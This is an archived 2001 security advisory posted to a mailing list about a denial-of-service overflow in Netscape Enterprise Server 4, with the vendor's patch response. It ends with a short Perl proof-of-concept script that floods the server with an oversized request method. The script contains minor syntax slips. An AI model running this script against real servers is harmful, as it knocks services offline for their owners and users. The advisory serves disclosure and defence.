OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Robert Cardona (dasquiddigizen-security.com)
Date: Sat May 19 2001 - 14:27:14 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Digizen Security Group advisory, 2001
    Netscape Enterprise Server 4 Method and URI overflow

    Systems affected:
    Netscape Enterprise Server 4/SP7 (possibly 4/SP3-SP7) running on
    Windows NT and Win2k

    Risk: Denial of Service
    Date: 18 May 2001
    Vendor Notified: 25 April 2001

    Legal Notice:
    This Advisory is Copyright (c) 2001 Digizen Security Group and Roberto
    Cardona. You
    may distribute it unmodified. You may not modify it and distribute it or
    distribute
    parts of it without the author's written permission.

    Disclaimer:
    In no event shall the author be liable for any damages whatsoever
    arising out of or in connection with the use of this information.
    Any use of this information is at the user's own risk.

    Description:

    By sending an invalid method or URI request of 4022 bytes Netscape
    Enterprise Server will
    stop responding to requests.

    Vendor Status:
    Netscape was informed and responded on the same business day.

    Vendor's Response:

    The security & stability of iPlanet's customer's environments is one of
    our paramount concerns. To ensure the stability of our customer's
    environments iPlanet has made available an NSAPI patch that can be
    applied to iPlanet Web Server, Enterprise Edition version 4.1 Service
    Packs 3 through 7. The NSAPI patch is available at
    http://www.iplanet.com/products/iplanet_web_enterprise/iwsalert5.11.html.
    This issue will also be addressed by the release of iPlanet Web Server,
    Enterprise Edition version 4.1 Service Pack 8.

    ----------------------------------------------------------------------------
    ----------
    #!/usr/bin/perl
    use IO::Socket;
      if (ARGV < 2) {
         print "Usage: host port\n";
         exit;
       }
    $overflow = "A" x $4022;
    &connect;
    sleep(15);
    &connect;
    exit;
    ################################################
    sub connect() {
      $sock= IO::Socket::INET->new(Proto=>"TCP",
                                 PeerAddr=>$ARGV[0],
                                 PeerPort=>"$ARGV[1]",)
                                 or die "Cant connect to $ARGV[0]: $!\n";
      $sock->autoflush(1);
      print $sock "$overflow /index.html HTTP/1.0\n\n";
      $response=<$sock>;
      print "$response";
      while(<$sock>){
         print "$_\n";
      }
      close $sock;
    }